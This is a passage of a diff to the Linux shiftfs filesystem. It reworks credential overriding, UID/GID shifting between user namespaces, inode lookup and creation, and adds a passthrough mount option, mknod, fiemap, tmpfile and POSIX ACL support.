*shiftfs_file_info_cache; -+ -+static void shiftfs_fill_inode(struct inode *inode, unsigned long ino, -+ umode_t mode, dev_t dev, struct dentry *dentry); -+ -+#define SHIFTFS_PASSTHROUGH_NONE 0 -+#define SHIFTFS_PASSTHROUGH_STAT 1 -+#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT) -+ -+static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info) -+{ -+ if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT)) -+ return false; -+ -+ if (info->info_mark && -+ !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT)) -+ return false; -+ -+ return true; -+} - - enum { - OPT_MARK, -+ OPT_PASSTHROUGH, - OPT_LAST, - }; - - /* global filesystem options */ - static const match_table_t tokens = { - { OPT_MARK, "mark" }, -+ { OPT_PASSTHROUGH, "passthrough=%u" }, - { OPT_LAST, NULL } - }; - --static const struct cred *shiftfs_get_up_creds(struct super_block *sb) -+static const struct cred *shiftfs_override_creds(const struct super_block *sb) - { -- struct shiftfs_super_info *ssi = sb->s_fs_info; -- struct cred *cred = prepare_creds(); -+ struct shiftfs_super_info *sbinfo = sb->s_fs_info; - -- if (!cred) -- return NULL; -+ return override_creds(sbinfo->creator_cred); -+} -+ -+static inline void shiftfs_revert_object_creds(const struct cred *oldcred, -+ struct cred *newcred) -+{ -+ revert_creds(oldcred); -+ put_cred(newcred); -+} -+ -+static int shiftfs_override_object_creds(const struct super_block *sb, -+ const struct cred **oldcred, -+ struct cred **newcred, -+ struct dentry *dentry, umode_t mode, -+ bool hardlink) -+{ -+ kuid_t fsuid = current_fsuid(); -+ kgid_t fsgid = current_fsgid(); -+ -+ *oldcred = shiftfs_override_creds(sb); -+ -+ *newcred = prepare_creds(); -+ if (!*newcred) { -+ revert_creds(*oldcred); -+ return -ENOMEM; -+ } -+ -+ (*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid)); -+ (*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid)); -+ -+ if (!hardlink) { -+ int err = security_dentry_create_files_as(dentry, mode, -+ &dentry->d_name, -+ *oldcred, *newcred); -+ if (err) { -+ shiftfs_revert_object_creds(*oldcred, *newcred); -+ return err; -+ } -+ } - -- cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid)); -- cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid)); -- put_user_ns(cred->user_ns); -- cred->user_ns = get_user_ns(ssi->userns); -+ put_cred(override_creds(*newcred)); -+ return 0; -+} - -- return cred; -+static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to, -+ kuid_t kuid) -+{ -+ uid_t uid = from_kuid(from, kuid); -+ return make_kuid(to, uid); - } - --static const struct cred *shiftfs_new_creds(const struct cred **newcred, -- struct super_block *sb) -+static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to, -+ kgid_t kgid) - { -- const struct cred *cred = shiftfs_get_up_creds(sb); -+ gid_t gid = from_kgid(from, kgid); -+ return make_kgid(to, gid); -+} - -- *newcred = cred; -+static void shiftfs_copyattr(struct inode *from, struct inode *to) -+{ -+ struct user_namespace *from_ns = from->i_sb->s_user_ns; -+ struct user_namespace *to_ns = to->i_sb->s_user_ns; -+ -+ to->i_uid = shift_kuid(from_ns, to_ns, from->i_uid); -+ to->i_gid = shift_kgid(from_ns, to_ns, from->i_gid); -+ to->i_mode = from->i_mode; -+ to->i_atime = from->i_atime; -+ to->i_mtime = from->i_mtime; -+ to->i_ctime = from->i_ctime; -+ i_size_write(to, i_size_read(from)); -+} - -- if (cred) -- cred = override_creds(cred); -- else -- printk(KERN_ERR "shiftfs: Credential override failed: no memory\n"); -+static void shiftfs_copyflags(struct inode *from, struct inode *to) -+{ -+ unsigned int mask = S_SYNC | S_IMMUTABLE | S_APPEND | S_NOATIME; - -- return cred; -+ inode_set_flags(to, from->i_flags & mask, mask); - } - --static void shiftfs_old_creds(const struct cred *oldcred, -- const struct cred **newcred) -+static void shiftfs_file_accessed(struct file *file) - { -- if (!*newcred) -+ struct inode *upperi, *loweri; -+ -+ if (file->f_flags & O_NOATIME) - return; - -- revert_creds(oldcred); -- put_cred(*newcred); -+ upperi = file_inode(file); -+ loweri = upperi->i_private; -+ -+ if (!loweri) -+ return; -+ -+ upperi->i_mtime = loweri->i_mtime; -+ upperi->i_ctime = loweri->i_ctime; -+ -+ touch_atime(&file->f_path); - } - --static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options) -+static int shiftfs_parse_mount_options(struct shiftfs_super_info *sbinfo, -+ char *options) - { - char *p; - substring_t args[MAX_OPT_ARGS]; - -- ssi->mark = false; -+ sbinfo->mark = false; -+ sbinfo->passthrough = 0; - - while ((p = strsep(&options, ",")) != NULL) { -- int token; -+ int err, intarg, token; - - if (!*p) - continue; -@@ -91,121 +188,140 @@ static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options) - token = match_token(p, tokens, args); - switch (token) { - case OPT_MARK: -- ssi->mark = true; -+ sbinfo->mark = true; -+ break; -+ case OPT_PASSTHROUGH: -+ err = match_int(&args[0], &intarg); -+ if (err) -+ return err; -+ -+ if (intarg & ~SHIFTFS_PASSTHROUGH_ALL) -+ return -EINVAL; -+ -+ sbinfo->passthrough = intarg; - break; - default: - return -EINVAL; - } - } -+ - return 0; - } - - static void shiftfs_d_release(struct dentry *dentry) - { -- struct dentry *real = dentry->d_fsdata; -+ struct dentry *lowerd = dentry->d_fsdata; - -- dput(real); -+ if (lowerd) -+ dput(lowerd); - } - - static struct dentry *shiftfs_d_real(struct dentry *dentry, - const struct inode *inode) - { -- struct dentry *real = dentry->d_fsdata; -+ struct dentry *lowerd = dentry->d_fsdata; -+ -+ if (inode && d_inode(dentry) == inode) -+ return dentry; - -- if (unlikely(real->d_flags & DCACHE_OP_REAL)) -- return real->d_op->d_real(real, real->d_inode); -+ lowerd = d_real(lowerd, inode); -+ if (lowerd && (!inode || inode == d_inode(lowerd))) -+ return lowerd; - -- return real; -+ WARN(1, "shiftfs_d_real(%pd4, %s:%lu): real dentry not found\n", dentry, -+ inode ? inode->i_sb->s_id : "NULL", inode ? inode->i_ino : 0); -+ return dentry; - } - - static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags) - { -- struct dentry *real = dentry->d_fsdata; -+ int err = 1; -+ struct dentry *lowerd = dentry->d_fsdata; - -- if (d_unhashed(real)) -+ if (d_is_negative(lowerd) != d_is_negative(dentry)) - return 0; - -- if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE)) -- return 1; -+ if ((lowerd->d_flags & DCACHE_OP_WEAK_REVALIDATE)) -+ err = lowerd->d_op->d_weak_revalidate(lowerd, flags); - -- return real->d_op->d_weak_revalidate(real, flags); -+ if (d_really_is_positive(dentry)) { -+ struct inode *inode = d_inode(dentry); -+ struct inode *loweri = d_inode(lowerd); -+ -+ shiftfs_copyattr(loweri, inode); -+ if (!inode->i_nlink) -+ err = 0; -+ } -+ -+ return err; - } - - static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags) - { -- struct dentry *real = dentry->d_fsdata; -- int ret; -+ int err = 1; -+ struct dentry *lowerd = dentry->d_fsdata; - -- if (d_unhashed(real)) -+ if (d_unhashed(lowerd) || -+ ((d_is_negative(lowerd) != d_is_negative(dentry)))) - return 0; - -- /* -- * inode state of underlying changed from positive to negative -- * or vice versa; force a lookup to update our view -- */ -- if (d_is_negative(real) != d_is_negative(dentry)) -- return 0; -+ if (flags & LOOKUP_RCU) -+ return -ECHILD; - -- if (!(real->d_flags & DCACHE_OP_REVALIDATE)) -- return 1; -+ if ((lowerd->d_flags & DCACHE_OP_REVALIDATE)) -+ err = lowerd->d_op->d_revalidate(lowerd, flags); - -- ret = real->d_op->d_revalidate(real, flags); -+ if (d_really_is_positive(dentry)) { -+ struct inode *inode = d_inode(dentry); -+ struct inode *loweri = d_inode(lowerd); - -- if (ret == 0 && !(flags & LOOKUP_RCU)) -- d_invalidate(real); -+ shiftfs_copyattr(loweri, inode); -+ if (!inode->i_nlink) -+ err = 0; -+ } - -- return ret; -+ return err; - } - - static const struct dentry_operations shiftfs_dentry_ops = { -- .d_release = shiftfs_d_release, -- .d_real = shiftfs_d_real, -- .d_revalidate = shiftfs_d_revalidate, -+ .d_release = shiftfs_d_release, -+ .d_real = shiftfs_d_real, -+ .d_revalidate = shiftfs_d_revalidate, - .d_weak_revalidate = shiftfs_d_weak_revalidate, - }; - --static int shiftfs_readlink(struct dentry *dentry, char __user *data, -- int flags) --{ -- struct dentry *real = dentry->d_fsdata; -- const struct inode_operations *iop = real->d_inode->i_op; -- -- if (iop->readlink) -- return iop->readlink(real, data, flags); -- -- return -EINVAL; --} -- - static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode, - struct delayed_call *done) - { -- if (dentry) { -- struct dentry *real = dentry->d_fsdata; -- struct inode *reali = real->d_inode; -- const struct inode_operations *iop = reali->i_op; -- const char *res = ERR_PTR(-EPERM); -- -- if (iop->get_link) -- res = iop->get_link(real, reali, done); -+ const char *p; -+ const struct cred *oldcred; -+ struct dentry *lowerd; - -- return res; -- } else { -- /* RCU lookup not supported */ -+ /* RCU lookup not supported */ -+ if (!dentry) - return ERR_PTR(-ECHILD); -- } -+ -+ lowerd = dentry->d_fsdata; -+ oldcred = shiftfs_override_creds(dentry->d_sb); -+ p = vfs_get_link(lowerd, done); -+ revert_creds(oldcred); -+ -+ return p; - } - - static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode, - const char *name, const void *value, - size_t size, int flags) - { -- struct dentry *real = dentry->d_fsdata; -- int err = -EOPNOTSUPP; -- const struct cred *oldcred, *newcred; -+ struct dentry *lowerd = dentry->d_fsdata; -+ int err; -+ const struct cred *oldcred; -+ -+ oldcred = shiftfs_override_creds(dentry->d_sb); -+ err = vfs_setxattr(lowerd, name, value, size, flags); -+ revert_creds(oldcred); - -- oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -- err = vfs_setxattr(real, name, value, size, flags); -- shiftfs_old_creds(oldcred, &newcred); -+ shiftfs_copyattr(lowerd->d_inode, inode); - - return err; - } -@@ -214,13 +330,13 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler, - struct dentry *dentry, struct inode *inode, - const char *name, void *value, size_t size) - { -- struct dentry *real = dentry->d_fsdata; -+ struct dentry *lowerd = dentry->d_fsdata; - int err; -- const struct cred *oldcred, *newcred; -+ const struct cred *oldcred; - -- oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -- err = vfs_getxattr(real, name, value, size); -- shiftfs_old_creds(oldcred, &newcred); -+ oldcred = shiftfs_override_creds(dentry->d_sb); -+ err = vfs_getxattr(lowerd, name, value, size); -+ revert_creds(oldcred); - - return err; - } -@@ -228,26 +344,29 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler, - static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list, - size_t size) - { -- struct dentry *real = dentry->d_fsdata; -+ struct dentry *lowerd = dentry->d_fsdata; - int err; -- const struct cred *oldcred, *newcred; -+ const struct cred *oldcred; - -- oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -- err = vfs_listxattr(real, list, size); -- shiftfs_old_creds(oldcred, &newcred); -+ oldcred = shiftfs_override_creds(dentry->d_sb); -+ err = vfs_listxattr(lowerd, list, size); -+ revert_creds(oldcred); - - return err; - } - - static int shiftfs_removexattr(struct dentry *dentry, const char *name) - { -- struct dentry *real = dentry->d_fsdata; -+ struct dentry *lowerd = dentry->d_fsdata; - int err; -- const struct cred *oldcred, *newcred; -+ const struct cred *oldcred; -+ -+ oldcred = shiftfs_override_creds(dentry->d_sb); -+ err = vfs_removexattr(lowerd, name); -+ revert_creds(oldcred); - -- oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -- err = vfs_removexattr(real, name); -- shiftfs_old_creds(oldcred, &newcred); -+ /* update c/mtime */ -+ shiftfs_copyattr(lowerd->d_inode, d_inode(dentry)); - - return err; - } -@@ -262,93 +381,157 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler, - return shiftfs_setxattr(dentry, inode, name, value, size, flags); - } - --static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry) -+static int shiftfs_inode_test(struct inode *inode, void *data) - { -- struct inode *reali; -- -- if (!dentry) -- return; -- -- reali = dentry->d_inode; -- -- if (!reali->i_op->get_link) -- inode->i_opflags |= IOP_NOFOLLOW; -+ return inode->i_private == data; -+} - -- inode->i_mapping = reali->i_mapping; -- inode->i_private = dentry; -+static int shiftfs_inode_set(struct inode *inode, void *data) -+{ -+ inode->i_private = data; -+ return 0; - } - --static int shiftfs_make_object(struct inode *dir, struct dentry *dentry, -- umode_t mode, const char *symlink, -- struct dentry *hardlink, bool excl) -+static int shiftfs_create_object(struct inode *diri, struct dentry *dentry, -+ umode_t mode, const char *symlink, -+ struct dentry *hardlink, bool excl) - { -- struct dentry *real = dir->i_private, *new = dentry->d_fsdata; -- struct inode *reali = real->d_inode, *newi; -- const struct inode_operations *iop = reali->i_op; - int err; -- const struct cred *oldcred, *newcred; -- bool op_ok = false; -+ const struct cred *oldcred; -+ struct cred *newcred; -+ void *loweri_iop_ptr = NULL; -+ umode_t modei = mode; -+ struct super_block *dir_sb = diri->i_sb; -+ struct dentry *lowerd_new = dentry->d_fsdata; -+ struct inode *inode = NULL, *loweri_dir = diri->i_private; -+ const struct inode_operations *loweri_dir_iop = loweri_dir->i_op; -+ struct dentry *lowerd_link = NULL; - - if (hardlink) { -- op_ok = iop->link; -+ loweri_iop_ptr = loweri_dir_iop->link; - } else { - switch (mode & S_IFMT) { - case S_IFDIR: -- op_ok = iop->mkdir; -+ loweri_iop_ptr = loweri_dir_iop->mkdir; - break; - case S_IFREG: -- op_ok = iop->create; -+ loweri_iop_ptr = loweri_dir_iop->create; - break; - case S_IFLNK: -- op_ok = iop->symlink; -+ loweri_iop_ptr = loweri_dir_iop->symlink; -+ break; -+ case S_IFSOCK: -+ /* fall through */ -+ case S_IFIFO: -+ loweri_iop_ptr = loweri_dir_iop->mknod; -+ break; - } - } -- if (!op_ok) -- return -EINVAL; -+ if (!loweri_iop_ptr) { -+ err = -EINVAL; -+ goto out_iput; -+ } - -+ inode_lock_nested(loweri_dir, I_MUTEX_PARENT); - -- newi = shiftfs_new_inode(dentry->d_sb, mode, NULL); -- if (!newi) -- return -ENOMEM; -+ if (!hardlink) { -+ inode = new_inode(dir_sb); -+ if (!inode) { -+ err = -ENOMEM; -+ goto out_iput; -+ } -+ -+ /* -+ * new_inode() will have added the new inode to the super -+ * block's list of inodes. Further below we will call -+ * inode_insert5() Which would perform the same operation again -+ * thereby corrupting the list. To avoid this raise I_CREATING -+ * in i_state which will cause inode_insert5() to skip this -+ * step. I_CREATING will be cleared by d_instantiate_new() -+ * below. -+ */ -+ spin_lock(&inode->i_lock); -+ inode->i_state |= I_CREATING; -+ spin_unlock(&inode->i_lock); - -- oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ inode_init_owner(inode, diri, mode); -+ modei = inode->i_mode; -+ } - -- inode_lock_nested(reali, I_MUTEX_PARENT); -+ err = shiftfs_override_object_creds(dentry->d_sb, &oldcred, &newcred, -+ dentry, modei, hardlink != NULL); -+ if (err) -+ goto out_iput; - -- err = -EINVAL; /* shut gcc up about uninit var */ - if (hardlink) { -- struct dentry *realhardlink = hardlink->d_fsdata; -- -- err = vfs_link(realhardlink, reali, new, NULL); -+ lowerd_link = hardlink->d_fsdata; -+ err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL); - } else { -- switch (mode & S_IFMT) { -+ switch (modei & S_IFMT) { - case S_IFDIR: -- err = vfs_mkdir(reali, new, mode); -+ err = vfs_mkdir(loweri_dir, lowerd_new, modei); - break; - case S_IFREG: -- err = vfs_create(reali, new, mode, excl); -+ err = vfs_create(loweri_dir, lowerd_new, modei, excl); - break; - case S_IFLNK: -- err = vfs_symlink(reali, new, symlink); -+ err = vfs_symlink(loweri_dir, lowerd_new, symlink); -+ break; -+ case S_IFSOCK: -+ /* fall through */ -+ case S_IFIFO: -+ err = vfs_mknod(loweri_dir, lowerd_new, modei, 0); -+ break; -+ default: -+ err = -EINVAL; -+ break; - } - } - -- shiftfs_old_creds(oldcred, &newcred); -+ shiftfs_revert_object_creds(oldcred, newcred); - -+ if (!err && WARN_ON(!lowerd_new->d_inode)) -+ err = -EIO; - if (err) -- goto out_dput; -+ goto out_iput; -+ -+ if (hardlink) { -+ inode = d_inode(hardlink); -+ ihold(inode); -+ -+ /* copy up times from lower inode */ -+ shiftfs_copyattr(d_inode(lowerd_link), inode); -+ set_nlink(d_inode(hardlink), d_inode(lowerd_link)->i_nlink); -+ d_instantiate(dentry, inode); -+ } else { -+ struct inode *inode_tmp; -+ struct inode *loweri_new = d_inode(lowerd_new); -+ -+ inode_tmp = inode_insert5(inode, (unsigned long)loweri_new, -+ shiftfs_inode_test, shiftfs_inode_set, -+ loweri_new); -+ if (unlikely(inode_tmp != inode)) { -+ pr_err_ratelimited("shiftfs: newly created inode found in cache\n"); -+ iput(inode_tmp); -+ err = -EINVAL; -+ goto out_iput; -+ } - -- shiftfs_fill_inode(newi, new); -+ ihold(loweri_new); -+ shiftfs_fill_inode(inode, loweri_new->i_ino, loweri_new->i_mode, -+ 0, lowerd_new); -+ d_instantiate_new(dentry, inode); -+ } - -- d_instantiate(dentry, newi); -+ shiftfs_copyattr(loweri_dir, diri); -+ if (loweri_iop_ptr == loweri_dir_iop->mkdir) -+ set_nlink(diri, loweri_dir->i_nlink); - -- new = NULL; -- newi = NULL; -+ inode = NULL; - -- out_dput: -- dput(new); -- iput(newi); -- inode_unlock(reali); -+out_iput: -+ iput(inode); -+ inode_unlock(loweri_dir); - - return err; - } -@@ -358,7 +541,7 @@ static int shiftfs_create(struct inode *dir, struct dentry *dentry, - { - mode |= S_IFREG; - -- return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl); -+ return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl); - } - - static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry, -@@ -366,39 +549,52 @@ static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry, - { - mode |= S_IFDIR; - -- return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false); -+ return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false); - } - - static int shiftfs_link(struct dentry *hardlink, struct inode *dir, - struct dentry *dentry) - { -- return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false); -+ return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false); -+} -+ -+static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode, -+ dev_t rdev) -+{ -+ if (!S_ISFIFO(mode) && !S_ISSOCK(mode)) -+ return -EPERM; -+ -+ return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false); - } - - static int shiftfs_symlink(struct inode *dir, struct dentry *dentry, - const char *symlink) - { -- return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false); -+ return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false); - } - - static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) - { -- struct dentry *real = dir->i_private, *new = dentry->d_fsdata; -- struct inode *reali = real->d_inode; -+ struct dentry *lowerd = dentry->d_fsdata; -+ struct inode *loweri = dir->i_private; - int err; -- const struct cred *oldcred, *newcred; -- -- inode_lock_nested(reali, I_MUTEX_PARENT); -- -- oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ const struct cred *oldcred; - -+ oldcred = shiftfs_override_creds(dentry->d_sb); -+ inode_lock_nested(loweri, I_MUTEX_PARENT); - if (rmdir) -- err = vfs_rmdir(reali, new); -+ err = vfs_rmdir(loweri, lowerd); - else -- err = vfs_unlink(reali, new, NULL); -+ err = vfs_unlink(loweri, lowerd, NULL); -+ inode_unlock(loweri); -+ revert_creds(oldcred); - -- shiftfs_old_creds(oldcred, &newcred); -- inode_unlock(reali); -+ shiftfs_copyattr(loweri, dir); -+ set_nlink(d_inode(dentry), loweri->i_nlink); -+ if (!err) -+ d_drop(dentry); -+ -+ set_nlink(dir, loweri->i_nlink); - - return err; - } -@@ -417,27 +613,30 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old, - struct inode *newdir, struct dentry *new, - unsigned int flags) - { -- struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private, -- *realold = old->d_fsdata, -- *realnew = new->d_fsdata, *trap; -- struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode; -+ struct dentry *lowerd_dir_old = old->d_parent->d_fsdata, -+ *lowerd_dir_new = new->d_parent->d_fsdata, -+ *lowerd_old = old->d_fsdata, *lowerd_new = new->d_fsdata, -+ *trapd; -+ struct inode *loweri_dir_old = lowerd_dir_old->d_inode, -+ *loweri_dir_new = lowerd_dir_new->d_inode; - int err = -EINVAL; -- const struct cred *oldcred, *newcred; -+ const struct cred *oldcred; - -- trap = lock_rename(rndd, rodd); -+ trapd = lock_rename(lowerd_dir_new, lowerd_dir_old); - -- if (trap == realold || trap == realnew) -+ if (trapd == lowerd_old || trapd == lowerd_new) - goto out_unlock; - -- oldcred = shiftfs_new_creds(&newcred, old->d_sb); -- -- err = vfs_rename(realolddir, realold, realnewdir, -- realnew, NULL, flags); -+ oldcred = shiftfs_override_creds(old->d_sb); -+ err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new, -+ NULL, flags); -+ revert_creds(oldcred); - -- shiftfs_old_creds(oldcred, &newcred); -+ shiftfs_copyattr(loweri_dir_old, olddir); -+ shiftfs_copyattr(loweri_dir_new, newdir); - -- out_unlock: -- unlock_rename(rndd, rodd); -+out_unlock: -+ unlock_rename(lowerd_dir_new, lowerd_dir_old); - - return err; - } -@@ -445,304 +644,1210 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old, - static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry, - unsigned int flags) - { -- struct dentry *real = dir->i_private, *new; -- struct inode *reali = real->d_inode, *newi; -- const struct cred *oldcred, *newcred; -- -- inode_lock(reali); -- oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -- new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len); -- shiftfs_old_creds(oldcred, &newcred); -- inode_unlock(reali); -+ struct dentry *new; -+ struct inode *newi; -+ const struct cred *oldcred; -+ struct dentry *lowerd = dentry->d_parent->d_fsdata; -+ struct inode *inode = NULL, *loweri = lowerd->d_inode; -+ -+ inode_lock(loweri); -+ oldcred = shiftfs_override_creds(dentry->d_sb); -+ new = lookup_one_len(dentry->d_name.name, lowerd, dentry->d_name.len); -+ revert_creds(oldcred); -+ inode_unlock(loweri); - - if (IS_ERR(new)) - return new; - - dentry->d_fsdata = new; - -- newi = NULL; -- if (!new->d_inode) -+ newi = new->d_inode; -+ if (!newi) - goto out; - -- newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new); -- if (!newi) { -+ inode = iget5_locked(dentry->d_sb, (unsigned long)newi, -+ shiftfs_inode_test, shiftfs_inode_set, newi); -+ if (!inode) { - dput(new); - return ERR_PTR(-ENOMEM); - } -+ if (inode->i_state & I_NEW) { -+ /* -+ * inode->i_private set by shiftfs_inode_set(), but we still -+ * need to take a reference -+ */ -+ ihold(newi); -+ shiftfs_fill_inode(inode, newi->i_ino, newi->i_mode, 0, new); -+ unlock_new_inode(inode); -+ } - -- out: -- return d_splice_alias(newi, dentry); -+out: -+ return d_splice_alias(inode, dentry); - } - - static int shiftfs_permission(struct inode *inode, int mask) - { -- struct dentry *real = inode->i_private; -- struct inode *reali = real->d_inode; -- const struct inode_operations *iop = reali->i_op; - int err; -- const struct cred *oldcred, *newcred; -+ const struct cred *oldcred; -+ struct inode *loweri = inode->i_private; - -- if (mask & MAY_NOT_BLOCK) -+ if (!loweri) { -+ WARN_ON(!(mask & MAY_NOT_BLOCK)); - return -ECHILD; -+ } - -- oldcred = shiftfs_new_creds(&newcred, inode->i_sb); -- if (iop->permission) -- err = iop->permission(reali, mask); -- else -- err = generic_permission(reali, mask); -- shiftfs_old_creds(oldcred, &newcred); -+ err = generic_permission(inode, mask); -+ if (err) -+ return err; -+ -+ oldcred = shiftfs_override_creds(inode->i_sb); -+ err = inode_permission(loweri, mask); -+ revert_creds(oldcred); -+ -+ return err; -+} -+ -+static int shiftfs_fiemap(struct inode *inode, -+ struct fiemap_extent_info *fieinfo, u64 start, -+ u64 len) -+{ -+ int err; -+ const struct cred *oldcred; -+ struct inode *loweri = inode->i_private; -+ -+ if (!loweri->i_op->fiemap) -+ return -EOPNOTSUPP; -+ -+ oldcred = shiftfs_override_creds(inode->i_sb); -+ if (fieinfo->fi_flags & FIEMAP_FLAG_SYNC) -+ filemap_write_and_wait(loweri->i_mapping); -+ err = loweri->i_op->fiemap(loweri, fieinfo, start, len); -+ revert_creds(oldcred); -+ -+ return err; -+} -+ -+static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry, -+ umode_t mode) -+{ -+ int err; -+ const struct cred *oldcred; -+ struct dentry *lowerd = dentry->d_fsdata; -+ struct inode *loweri = dir->i_private; -+ -+ if (!loweri->i_op->tmpfile) -+ return -EOPNOTSUPP; -+ -+ oldcred = shiftfs_override_creds(dir->i_sb); -+ err = loweri->i_op->tmpfile(loweri, lowerd, mode); -+ revert_creds(oldcred); - - return err; - } - - static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - { -- struct dentry *real = dentry->d_fsdata; -- struct inode *reali = real->d_inode; -- const struct inode_operations *iop = reali->i_op; -+ struct dentry *lowerd = dentry->d_fsdata; -+ struct inode *loweri = lowerd->d_inode; - struct iattr newattr = *attr; -- const struct cred *oldcred, *newcred; -+ const struct cred *oldcred; - struct super_block *sb = dentry->d_sb; - int err; - -+ err = setattr_prepare(dentry, attr); -+ if (err) -+ return err; -+ - newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid)); - newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid)); - -- oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -- inode_lock(reali); -- if (iop->setattr) -- err = iop->setattr(real, &newattr); -- else -- err = simple_setattr(real, &newattr); -- inode_unlock(reali); -- shiftfs_old_creds(oldcred, &newcred); -+ inode_lock(loweri); -+ oldcred = shiftfs_override_creds(dentry->d_sb); -+ err = notify_change(lowerd, attr, NULL); -+ revert_creds(oldcred); -+ inode_unlock(loweri); - -- if (err) -- return err; -+ shiftfs_copyattr(loweri, d_inode(dentry)); - -- /* all OK, reflect the change on our inode */ -- setattr_copy(d_inode(dentry), attr); -- return 0; -+ return err; - } - - static int shiftfs_getattr(const struct path *path, struct kstat *stat, - u32 request_mask, unsigned int query_flags) - { - struct inode *inode = path->dentry->d_inode; -- struct dentry *real = path->dentry->d_fsdata; -- struct inode *reali = real->d_inode; -- const struct inode_operations *iop = reali->i_op; -- struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real }; -- int err = 0; -- -- if (iop->getattr) -- err = iop->getattr(&newpath, stat, request_mask, query_flags); -- else -- generic_fillattr(reali, stat); -+ struct dentry *lowerd = path->dentry->d_fsdata; -+ struct inode *loweri = lowerd->d_inode; -+ struct shiftfs_super_info *info = path->dentry->d_sb->s_fs_info; -+ struct path newpath = { .mnt = info->mnt, .dentry = lowerd }; -+ struct user_namespace *from_ns = loweri->i_sb->s_user_ns; -+ struct user_namespace *to_ns = inode->i_sb->s_user_ns; -+ const struct cred *oldcred; -+ int err; -+ -+ oldcred = shiftfs_override_creds(inode->i_sb); -+ err = vfs_getattr(&newpath, stat, request_mask, query_flags); -+ revert_creds(oldcred); - - if (err) - return err; - - /* transform the underlying id */ -- stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid)); -- stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid)); -+ stat->uid = shift_kuid(from_ns, to_ns, stat->uid); -+ stat->gid = shift_kgid(from_ns, to_ns, stat->gid); - return 0; - } - --static const struct inode_operations shiftfs_inode_ops = { -- .lookup = shiftfs_lookup, -- .getattr = shiftfs_getattr, -- .setattr = shiftfs_setattr, -- .permission = shiftfs_permission, -- .mkdir = shiftfs_mkdir, -- .symlink = shiftfs_symlink, -- .get_link = shiftfs_get_link, -- .readlink = shiftfs_readlink, -- .unlink = shiftfs_unlink, -- .rmdir = shiftfs_rmdir, -- .rename = shiftfs_rename, -- .link = shiftfs_link, -- .create = shiftfs_create, -- .mknod = NULL, /* no special files currently */ -- .listxattr = shiftfs_listxattr, --}; -+#ifdef CONFIG_SHIFT_FS_POSIX_ACL - --static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode, -- struct dentry *dentry) -+static int -+shift_acl_ids(struct user_namespace *from, struct user_namespace *to, -+ struct posix_acl *acl) - { -- struct inode *inode; -- -- inode = new_inode(sb); -- if (!inode) -- return NULL; -- -- /* -- * our inode is completely vestigial. All lookups, getattr -- * and permission checks are done on the underlying inode, so -- * what the user sees is entirely from the underlying inode. -- */ -- mode &= S_IFMT; -+ int i; -+ -+ for (i = 0; i < acl->a_count; i++) { -+ struct posix_acl_entry *e = &acl->a_entries[i]; -+ switch(e->e_tag) { -+ case ACL_USER: -+ e->e_uid = shift_kuid(from, to, e->e_uid); -+ if (!uid_valid(e->e_uid)) -+ return -EOVERFLOW; -+ break; -+ case ACL_GROUP: -+ e->e_gid = shift_kgid(from, to, e->e_gid); -+ if (!gid_valid(e->e_gid)) -+ return -EOVERFLOW; -+ break; -+ } -+ } -+ return 0; -+} - -- 